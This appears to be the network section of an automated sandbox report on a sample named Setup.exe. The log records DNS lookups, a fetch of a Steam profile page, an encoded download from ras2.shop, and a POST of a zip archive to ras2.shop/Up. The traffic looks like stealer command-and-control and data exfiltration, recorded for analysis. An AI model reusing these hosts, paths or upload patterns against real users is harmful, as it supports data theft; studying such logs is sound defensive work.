Dec 27, 2024 21:20:16.554373026 CET	1.1.1.1	192.168.2.4	0xc276	No error (0)	steamcommunity.com		23.55.153.106	A (IP address)	IN (0x0001)	false
Dec 27, 2024 21:20:19.531995058 CET	1.1.1.1	192.168.2.4	0x8c1d	No error (0)	ras2.shop		104.21.2.114	A (IP address)	IN (0x0001)	false
Dec 27, 2024 21:20:19.531995058 CET	1.1.1.1	192.168.2.4	0x8c1d	No error (0)	ras2.shop		172.67.129.32	A (IP address)	IN (0x0001)	false
Dec 27, 2024 21:20:27.459566116 CET	1.1.1.1	192.168.2.4	0x45d	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 27, 2024 21:20:27.459943056 CET	1.1.1.1	192.168.2.4	0xce68	No error (0)	www.google.com		172.217.21.36	A (IP address)	IN (0x0001)	false
Dec 27, 2024 21:20:34.726713896 CET	1.1.1.1	192.168.2.4	0x6ace	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 27, 2024 21:20:34.729353905 CET	1.1.1.1	192.168.2.4	0x742	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 27, 2024 21:20:34.729353905 CET	1.1.1.1	192.168.2.4	0x742	No error (0)	plus.l.google.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 27, 2024 21:20:35.720458984 CET	1.1.1.1	192.168.2.4	0x36ec	No error (0)	play.google.com		172.217.19.206	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

ras2.shop

www.google.com

apis.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	23.55.153.106	443	6900	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 20:20:18 UTC	257	OUT	GET /profiles/76561199680660089 HTTP/1.1 User-Agent: Mozilla/5.0 (Linux; U; Android 4.3.1; HP Compaq 2110b Build/JLS36C) AppleWebKit/601.32 (KHTML, like Gecko) Chrome/50.0.1590.318 Mobile Safari/534.3 Host: steamcommunity.com Cache-Control: no-cache
2024-12-27 20:20:18 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Fri, 27 Dec 2024 20:20:18 GMT Content-Length: 35329 Connection: close Set-Cookie: sessionid=62842537eed9660800f609de; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-27 20:20:18 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-27 20:20:19 UTC	10097	IN	Data Raw: 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a Data Ascii: eamcommunity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">
2024-12-27 20:20:19 UTC	10753	IN	Data Raw: 71 75 6f 74 3b 57 45 42 5f 55 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b Data Ascii: quot;WEB_UNIVERSE":"public","LANGUAGE":"english","COUNTRY":"US","MEDIA_CDN_COMMUNITY_URL":"https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/","MEDIA_CDN_URL"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	104.21.2.114	443	6900	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 20:20:20 UTC	262	OUT	GET /ujs/f1575b64-8492-4e8b-b102-4d26e8c70371 HTTP/1.1 User-Agent: Mozilla/5.0 (Linux; U; Android 4.3.1; HP Compaq 2110b Build/JLS36C) AppleWebKit/601.32 (KHTML, like Gecko) Chrome/50.0.1590.318 Mobile Safari/534.3 Host: ras2.shop Cache-Control: no-cache
2024-12-27 20:20:21 UTC	792	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 20:20:21 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hCfXoCzVOiKtRCJKpIX9uoX1W7V7xzkc7%2FY7%2Bg6EzAdtO%2FWVwqVcCO4r0%2B5gXqrk%2BT9VOf405Xsh6%2FyEDO7SymGtB09r6AUdgK%2FwU8VS0kW%2FW%2Fs0czwa8NhcodE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8c02bf69d04385-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1610&min_rtt=1607&rtt_var=610&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=900&delivery_rate=1784841&cwnd=250&unsent_bytes=0&cid=c855ee98a765a41b&ts=631&x=0"
2024-12-27 20:20:21 UTC	577	IN	Data Raw: 33 37 64 36 0d 0a 51 78 64 51 45 77 35 69 54 42 42 64 49 67 49 58 55 47 31 6f 57 67 38 51 48 79 4a 49 46 77 67 54 61 47 56 37 58 56 42 68 56 47 6c 75 64 6c 74 57 55 46 35 57 58 47 52 32 57 6b 4e 62 56 46 4a 75 62 31 56 4c 55 45 41 52 63 46 68 44 55 78 45 73 47 6b 45 51 43 77 55 56 46 55 4a 64 49 67 49 58 55 56 6c 47 56 6c 70 58 48 57 56 41 55 42 42 4d 47 45 49 56 58 42 45 36 47 6c 64 75 62 56 63 42 46 52 34 52 63 42 6f 50 45 47 31 6f 64 56 68 52 55 6d 78 6b 61 58 56 65 57 31 35 62 56 32 39 63 65 31 31 41 58 6c 6c 63 46 32 46 4c 55 32 52 70 5a 30 4a 52 53 78 64 32 55 6e 52 5a 46 78 34 54 51 42 73 4e 41 78 38 69 53 46 73 51 43 78 5a 61 58 30 42 63 62 56 30 62 56 30 6c 52 47 30 6f 65 53 43 4a 57 46 77 67 54 56 6d 56 72 55 51 73 69 46 42 64 43 45 77 34 62 61 Data Ascii: 37d6QxdQEw5iTBBdIgIXUG1oWg8QHyJIFwgTaGV7XVBhVGludltWUF5WXGR2WkNbVFJub1VLUEARcFhDUxEsGkEQCwUVFUJdIgIXUVlGVlpXHWVAUBBMGEIVXBE6GldubVcBFR4RcBoPEG1odVhRUmxkaXVeW15bV29ce11AXllcF2FLU2RpZ0JRSxd2UnRZFx4TQBsNAx8iSFsQCxZaX0BcbV0bV0lRG0oeSCJWFwgTVmVrUQsiFBdCEw4ba
2024-12-27 20:20:21 UTC	1369	IN	Data Raw: 52 59 6d 52 70 55 51 6b 57 46 52 56 43 45 54 6f 61 61 57 35 39 57 31 70 57 58 6d 39 63 66 31 70 64 56 6c 68 63 61 32 35 77 61 45 70 61 58 31 51 55 65 6c 5a 63 55 6e 4a 42 61 57 35 6b 52 31 78 46 45 6e 64 68 54 46 51 51 48 52 5a 4e 46 51 67 43 4c 42 70 46 58 42 4d 4f 47 31 52 61 51 57 39 56 55 42 78 55 54 46 77 56 54 78 39 37 47 6c 73 51 43 78 5a 62 61 32 35 51 4d 67 67 58 48 68 4e 45 47 77 30 51 62 31 78 30 57 6c 46 51 57 47 56 72 64 30 4e 70 57 78 56 69 51 31 31 50 56 6c 46 4b 49 48 70 48 58 55 5a 48 58 45 56 75 62 31 56 4c 55 45 41 52 63 46 68 44 55 78 45 73 47 6b 45 51 43 77 55 56 46 55 4a 64 49 67 49 58 56 30 46 64 57 68 6c 58 53 32 55 61 53 42 35 4b 46 6c 63 56 43 42 46 69 5a 47 6c 52 41 41 45 62 47 78 42 44 49 67 49 58 62 6d 31 34 56 6c 52 54 58 31 Data Ascii: RYmRpUQkWFRVCEToaaW59W1pWXm9cf1pdVlhca25waEpaX1QUelZcUnJBaW5kR1xFEndhTFQQHRZNFQgCLBpFXBMOG1RaQW9VUBxUTFwVTx97GlsQCxZba25QMggXHhNEGw0Qb1x0WlFQWGVrd0NpWxViQ11PVlFKIHpHXUZHXEVub1VLUEARcFhDUxEsGkEQCwUVFUJdIgIXV0FdWhlXS2UaSB5KFlcVCBFiZGlRAAEbGxBDIgIXbm14VlRTX1
2024-12-27 20:20:21 UTC	1369	IN	Data Raw: 57 31 5a 64 62 31 78 74 52 6c 64 44 46 48 31 57 52 6c 49 69 46 42 64 47 45 77 34 49 47 78 42 44 62 68 6f 50 45 46 31 64 58 46 56 54 58 43 35 64 54 56 63 54 53 52 56 4d 45 46 30 69 41 68 64 51 62 57 68 61 42 41 6f 52 4c 42 70 46 45 41 73 57 5a 57 74 2b 58 47 4e 5a 57 57 35 74 5a 58 42 6e 45 6d 42 31 53 6c 4e 75 62 57 46 4b 55 6b 41 54 52 46 6c 42 55 78 4d 59 47 30 4d 51 43 54 45 55 46 30 4a 66 46 67 4d 56 51 31 70 77 46 6c 42 4b 56 42 5a 45 47 30 6b 52 62 68 6f 50 45 46 4e 6f 5a 56 51 42 43 69 49 55 46 30 49 54 44 68 74 72 62 6e 39 76 57 31 52 65 62 57 68 33 58 6c 46 62 63 6c 64 59 56 32 31 6f 62 45 52 58 51 53 42 38 56 45 5a 51 46 68 55 56 52 68 45 36 43 52 6b 51 51 56 6f 62 44 52 42 64 61 56 74 64 51 46 35 5a 58 42 6c 58 53 32 55 61 53 42 35 4b 46 6c 63 Data Ascii: W1Zdb1xtRldDFH1WRlIiFBdGEw4IGxBDbhoPEF1dXFVTXC5dTVcTSRVMEF0iAhdQbWhaBAoRLBpFEAsWZWt+XGNZWW5tZXBnEmB1SlNubWFKUkATRFlBUxMYG0MQCTEUF0JfFgMVQ1pwFlBKVBZEG0kRbhoPEFNoZVQBCiIUF0ITDhtrbn9vW1RebWh3XlFbcldYV21obERXQSB8VEZQFhUVRhE6CRkQQVobDRBdaVtdQF5ZXBlXS2UaSB5KFlc
2024-12-27 20:20:21 UTC	1369	IN	Data Raw: 56 45 41 42 78 73 62 45 45 4d 69 41 68 64 75 62 57 5a 57 56 6c 39 61 62 6c 39 70 62 6e 35 45 58 45 56 54 45 31 4e 58 55 30 5a 47 56 55 74 53 62 6d 39 50 53 46 42 41 55 42 52 71 51 31 4e 52 62 46 30 58 48 68 4e 41 47 77 30 44 48 79 4a 49 57 78 41 4c 46 6c 5a 48 56 30 46 68 46 6c 42 4b 56 42 5a 45 47 30 6b 52 62 68 6f 50 45 46 4e 6f 5a 56 51 44 41 43 49 55 46 30 49 54 44 68 74 72 62 6d 46 76 57 56 68 62 58 31 4e 6c 61 33 31 44 5a 55 70 55 45 6d 4a 62 58 30 4e 46 55 6e 4a 64 61 57 35 2b 52 46 78 46 55 78 4e 48 59 42 56 68 52 56 56 62 57 31 63 52 4c 42 70 42 45 41 73 46 46 52 56 43 58 53 49 43 46 31 31 42 55 55 74 57 48 46 5a 34 58 52 64 50 48 55 38 62 57 52 41 4a 49 6c 70 70 62 6c 49 46 43 68 55 65 45 58 41 61 44 78 42 74 61 48 56 59 55 56 4a 73 5a 47 6c 39 Data Ascii: VEABxsbEEMiAhdubWZWVl9abl9pbn5EXEVTE1NXU0ZGVUtSbm9PSFBAUBRqQ1NRbF0XHhNAGw0DHyJIWxALFlZHV0FhFlBKVBZEG0kRbhoPEFNoZVQDACIUF0ITDhtrbmFvWVhbX1Nla31DZUpUEmJbX0NFUnJdaW5+RFxFUxNHYBVhRVVbW1cRLBpBEAsFFRVCXSICF11BUUtWHFZ4XRdPHU8bWRAJIlppblIFChUeEXAaDxBtaHVYUVJsZGl9
2024-12-27 20:20:21 UTC	1369	IN	Data Raw: 42 76 55 55 56 58 58 46 4a 63 57 56 5a 65 5a 46 74 53 57 6c 39 52 58 6c 35 66 58 53 49 55 46 31 77 54 44 68 74 41 41 42 46 39 46 45 34 51 57 46 41 62 44 52 42 56 61 46 70 61 57 6c 68 5a 57 46 4a 65 55 57 39 51 52 56 68 54 56 6c 56 54 55 56 31 6e 57 31 74 54 51 56 70 64 57 46 5a 5a 63 42 6f 5a 45 46 38 57 41 78 56 46 41 43 4a 46 47 55 6b 54 58 56 30 56 43 42 46 6a 56 6c 68 54 58 46 56 59 56 46 70 44 63 46 5a 65 57 46 5a 61 55 46 74 57 51 32 52 56 58 6c 4e 51 58 31 78 64 58 46 74 68 58 52 63 65 45 31 6f 62 44 52 42 45 4f 42 70 49 48 6b 6f 57 55 46 4d 51 43 53 4a 57 57 56 42 63 57 6c 64 65 57 46 42 75 56 46 42 56 57 6c 35 54 52 31 46 56 61 6c 74 5a 58 31 4a 53 58 6c 42 55 56 6d 5a 63 57 42 41 64 46 6c 63 56 43 42 46 33 41 52 64 50 48 55 38 62 58 6c 59 52 4f Data Ascii: BvUUVXXFJcWVZeZFtSWl9RXl5fXSIUF1wTDhtAABF9FE4QWFAbDRBVaFpaWlhZWFJeUW9QRVhTVlVTUV1nW1tTQVpdWFZZcBoZEF8WAxVFACJFGUkTXV0VCBFjVlhTXFVYVFpDcFZeWFZaUFtWQ2RVXlNQX1xdXFthXRceE1obDRBEOBpIHkoWUFMQCSJWWVBcWldeWFBuVFBVWl5TR1FValtZX1JSXlBUVmZcWBAdFlcVCBF3ARdPHU8bXlYRO
2024-12-27 20:20:21 UTC	1369	IN	Data Raw: 55 56 56 31 52 61 6c 56 64 58 6c 39 54 56 6c 4a 55 55 6d 6c 58 58 31 52 64 58 6c 70 63 57 31 39 6f 55 46 6c 61 55 6c 34 62 47 78 42 64 49 67 49 58 52 51 4d 4e 47 30 6f 65 53 43 4a 52 55 52 41 4c 46 6c 4a 62 58 46 4a 6c 55 6c 39 56 55 31 31 62 57 6c 70 66 5a 55 68 64 58 46 6c 45 56 46 5a 64 56 57 39 51 55 6c 6c 42 55 31 4a 54 45 42 38 69 56 68 63 49 45 30 4d 4c 42 78 42 4f 4c 45 4d 58 57 31 55 57 41 78 56 62 55 57 35 64 58 31 5a 58 58 6c 52 61 57 55 4e 6a 56 6c 6c 43 56 46 5a 53 57 31 39 64 61 31 64 51 58 56 68 63 56 6c 46 58 55 43 49 55 46 31 77 54 44 68 74 41 41 41 49 69 52 52 6c 4a 45 31 31 64 46 51 67 52 5a 56 4a 58 55 31 31 57 57 46 78 64 51 32 78 62 58 56 35 57 58 46 78 55 56 6c 4a 73 56 56 42 58 56 46 56 54 57 56 74 65 61 46 55 58 48 68 4e 61 47 77 Data Ascii: UVV1RalVdXl9TVlJUUmlXX1RdXlpcW19oUFlaUl4bGxBdIgIXRQMNG0oeSCJRURALFlJbXFJlUl9VU11bWlpfZUhdXFlEVFZdVW9QUllBU1JTEB8iVhcIE0MLBxBOLEMXW1UWAxVbUW5dX1ZXXlRaWUNjVllCVFZSW19da1dQXVhcVlFXUCIUF1wTDhtAAAIiRRlJE11dFQgRZVJXU11WWFxdQ2xbXV5WXFxUVlJsVVBXVFVTWVteaFUXHhNaGw
2024-12-27 20:20:21 UTC	1369	IN	Data Raw: 42 42 4e 4a 46 55 77 51 57 6d 51 61 44 78 42 58 52 46 70 57 58 31 70 6c 55 6c 4a 55 58 46 6c 52 57 56 70 52 59 31 6c 54 58 31 39 52 58 31 56 62 57 57 4a 55 58 46 78 58 55 68 73 62 45 46 30 69 41 68 64 46 42 51 4d 62 53 68 35 49 49 6c 46 52 45 41 73 57 58 46 42 57 56 32 52 53 56 31 68 64 56 31 4e 55 57 56 70 6c 55 6c 64 51 55 46 70 63 57 46 42 59 63 46 39 62 58 30 46 66 56 30 63 51 48 79 4a 57 46 77 67 54 51 77 30 50 45 45 34 73 51 78 64 62 56 52 59 44 46 56 78 61 61 46 52 51 55 46 56 59 57 6c 52 59 57 57 52 64 58 31 56 65 56 30 6c 59 56 56 56 77 55 46 42 54 57 6c 39 4a 57 46 5a 52 49 68 51 58 58 42 4d 4f 47 30 41 47 43 69 4a 46 47 55 6b 54 58 56 30 56 43 42 46 70 56 46 64 62 55 31 39 65 58 46 39 66 61 31 42 53 58 45 46 54 58 31 74 52 57 57 52 65 55 46 52 Data Ascii: BBNJFUwQWmQaDxBXRFpWX1plUlJUXFlRWVpRY1lTX19RX1VbWWJUXFxXUhsbEF0iAhdFBQMbSh5IIlFREAsWXFBWV2RSV1hdV1NUWVplUldQUFpcWFBYcF9bX0FfV0cQHyJWFwgTQw0PEE4sQxdbVRYDFVxaaFRQUFVYWlRYWWRdX1VeV0lYVVVwUFBTWl9JWFZRIhQXXBMOG0AGCiJFGUkTXV0VCBFpVFdbU19eXF9fa1BSXEFTX1tRWWReUFR
2024-12-27 20:20:21 UTC	1369	IN	Data Raw: 57 5a 55 56 46 34 54 47 42 74 5a 45 41 6b 69 53 41 4d 46 45 30 6b 56 54 42 42 61 5a 42 6f 50 45 46 68 59 58 6c 52 63 57 32 56 55 52 56 46 5a 57 6c 70 53 56 31 70 77 55 55 56 62 57 31 56 56 58 56 6c 52 62 46 70 57 58 56 4e 59 47 78 73 51 58 53 49 43 46 30 49 48 44 42 74 4b 48 6b 67 69 55 56 45 51 43 78 5a 58 57 56 56 51 5a 56 74 65 55 46 42 45 58 46 56 55 57 6d 31 57 57 56 78 59 58 56 42 57 57 6c 68 68 56 6c 46 52 58 56 5a 56 56 52 41 66 49 6c 59 58 43 42 4e 45 44 77 34 51 54 69 78 44 46 31 74 56 46 67 4d 56 58 56 46 76 56 31 74 54 57 6c 46 55 57 46 52 44 59 56 52 57 56 56 5a 63 56 6c 52 55 58 47 46 63 57 6c 52 59 55 46 4e 63 57 56 67 69 46 42 64 63 45 77 34 62 52 77 55 44 49 6b 55 5a 53 52 4e 64 58 52 55 49 45 57 5a 63 58 31 4e 63 56 56 4a 48 56 46 46 69 Data Ascii: WZUVF4TGBtZEAkiSAMFE0kVTBBaZBoPEFhYXlRcW2VURVFZWlpSV1pwUUVbW1VVXVlRbFpWXVNYGxsQXSICF0IHDBtKHkgiUVEQCxZXWVVQZVteUFBEXFVUWm1WWVxYXVBWWlhhVlFRXVZVVRAfIlYXCBNEDw4QTixDF1tVFgMVXVFvV1tTWlFUWFRDYVRWVVZcVlRUXGFcWlRYUFNcWVgiFBdcEw4bRwUDIkUZSRNdXRUIEWZcX1NcVVJHVFFi
2024-12-27 20:20:21 UTC	1369	IN	Data Raw: 52 5a 55 46 46 6b 56 46 6c 55 58 31 64 54 56 46 39 63 63 46 35 62 55 52 4d 59 47 31 6b 51 43 53 4a 49 44 51 55 54 53 52 56 4d 45 46 70 6b 47 67 38 51 56 46 39 53 58 31 35 61 61 46 4a 62 58 6c 78 65 58 46 6c 62 57 47 4a 66 57 46 70 57 58 6c 4a 63 58 46 78 6c 56 46 4e 43 56 46 41 62 47 78 42 64 49 67 49 58 51 67 6b 4d 47 30 6f 65 53 43 4a 52 55 52 41 4c 46 6c 4e 5a 56 56 46 70 55 31 78 65 55 6c 4e 61 57 56 52 58 59 6c 56 62 58 31 39 5a 56 31 74 58 56 6d 39 56 55 31 52 53 58 56 52 62 45 42 38 69 56 68 63 49 45 30 51 42 44 68 42 4f 4c 45 4d 58 57 31 55 57 41 78 56 61 55 47 70 66 58 46 78 66 56 6c 31 62 57 56 64 75 56 6c 52 61 58 6c 4e 61 58 31 39 57 61 56 78 62 58 31 64 58 55 6c 31 64 58 69 49 55 46 31 77 54 44 68 74 48 43 77 4d 69 52 52 6c 4a 45 31 31 64 46 Data Ascii: RZUFFkVFlUX1dTVF9ccF5bURMYG1kQCSJIDQUTSRVMEFpkGg8QVF9SX15aaFJbXlxeXFlbWGJfWFpWXlJcXFxlVFNCVFAbGxBdIgIXQgkMG0oeSCJRURALFlNZVVFpU1xeUlNaWVRXYlVbX19ZV1tXVm9VU1RSXVRbEB8iVhcIE0QBDhBOLEMXW1UWAxVaUGpfXFxfVl1bWVduVlRaXlNaX19WaVxbX1dXUl1dXiIUF1wTDhtHCwMiRRlJE11dF
2024-12-27 20:20:21 UTC	1369	IN	Data Raw: 51 57 46 41 62 44 52 42 53 59 31 56 55 55 56 35 51 55 6c 31 51 56 32 64 56 57 6c 35 55 55 56 74 59 58 6c 35 6b 55 6c 70 63 57 46 68 53 55 31 42 51 61 42 6f 5a 45 46 38 57 41 78 56 46 41 6a 41 50 46 30 38 64 54 78 74 65 56 68 45 36 47 6b 56 61 57 6c 5a 59 57 6c 64 56 61 56 5a 53 56 56 78 56 55 6c 42 5a 58 33 42 54 57 56 68 62 57 56 35 65 55 46 78 6f 56 6c 64 54 45 78 67 62 57 52 41 4a 49 6b 38 45 41 67 6b 57 52 42 74 4a 45 57 6c 63 46 77 67 54 55 56 39 56 56 56 39 6e 56 31 4e 64 57 45 52 4a 56 56 56 51 61 6c 31 46 58 46 6c 64 57 31 74 54 57 6d 4a 62 57 31 46 64 55 31 49 56 48 68 46 75 47 67 38 51 52 67 55 4a 44 68 42 4f 4c 45 4d 58 57 31 55 57 41 78 56 65 51 32 5a 62 56 31 68 61 57 6c 42 64 51 6c 5a 6c 55 56 6c 65 57 46 4a 58 58 46 74 59 5a 31 5a 57 57 31 Data Ascii: QWFAbDRBSY1VUUV5QUl1QV2dVWl5UUVtYXl5kUlpcWFhSU1BQaBoZEF8WAxVFAjAPF08dTxteVhE6GkVaWlZYWldVaVZSVVxVUlBZX3BTWVhbWV5eUFxoVldTExgbWRAJIk8EAgkWRBtJEWlcFwgTUV9VVV9nV1NdWERJVVVQal1FXFldW1tTWmJbW1FdU1IVHhFuGg8QRgUJDhBOLEMXW1UWAxVeQ2ZbV1haWlBdQlZlUVleWFJXXFtYZ1ZWW1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49734	104.21.2.114	443	6900	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 20:20:22 UTC	162	OUT	POST /Up HTTP/1.1 Content-Type: application/octet-stream; boundary=---- User-Agent: MyApp/1.0 Host: ras2.shop Content-Length: 349 Cache-Control: no-cache
2024-12-27 20:20:22 UTC	337	OUT	Data Raw: 50 4b 03 04 14 00 08 08 08 00 8a 7a 9b 59 00 00 00 00 00 00 00 00 00 00 00 00 28 00 04 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 01 00 00 00 7d 8d bd 0e 02 21 1c c3 5f 85 74 66 e0 9b 93 d1 b8 ba b8 38 18 07 8e 43 43 62 c0 c0 45 2f 31 be bb ff 27 70 6b 7f 6d da 0f 22 02 36 67 c0 31 af 24 e7 d8 6b 21 93 10 14 c7 1d e1 82 63 49 bd 8d 76 5b d9 3e 8e 92 d8 29 d7 25 77 76 e8 e5 95 3b 55 ff e7 57 8e 07 82 f4 da 6a ed 95 75 1c 8d 6e ce a5 2e ed 3d 98 14 34 f0 24 e0 9d 77 6e 22 d3 11 8c d8 59 8e 41 54 aa 49 6c 52 28 83 ef 0f 50 4b 07 08 e1 92 3f f6 7f 00 00 00 00 00 00 00 aa 00 00 00 00 00 00 00 50 4b 01 02 00 00 14 00 08 08 08 00 8a 7a 9b 59 e1 92 3f f6 7f 00 00 00 aa 00 00 00 28 00 Data Ascii: PKzY(f1575b64-8492-4e8b-b102-4d26e8c70371.txt}!_tf8CCbE/1'pkm"6g1$k!cIv[>)%wv;UWjun.=4$wn"YATIlR(PK?PKzY?(
2024-12-27 20:20:22 UTC	12	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a Data Ascii: --------
2024-12-27 20:20:23 UTC	733	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 20:20:23 GMT Content-Length: 0 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vvvzbYSf4dWvWWpVjvHx04u1lfllAwIl%2BLvvIXhWkus5ExWFmZcO%2BVG1NzcBqAt2X2EfHCyKRO8M2ZH9A1rhpQwu8VsFMIZ%2BxifrOu1sOw1Z7vqAj1hH%2F9H1dPY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8c02cd58d90f55-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1641&rtt_var=672&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2818&recv_bytes=1193&delivery_rate=1563169&cwnd=156&unsent_bytes=0&cid=59f4c0e578684386&ts=642&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49744	172.217.21.36	443	764	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
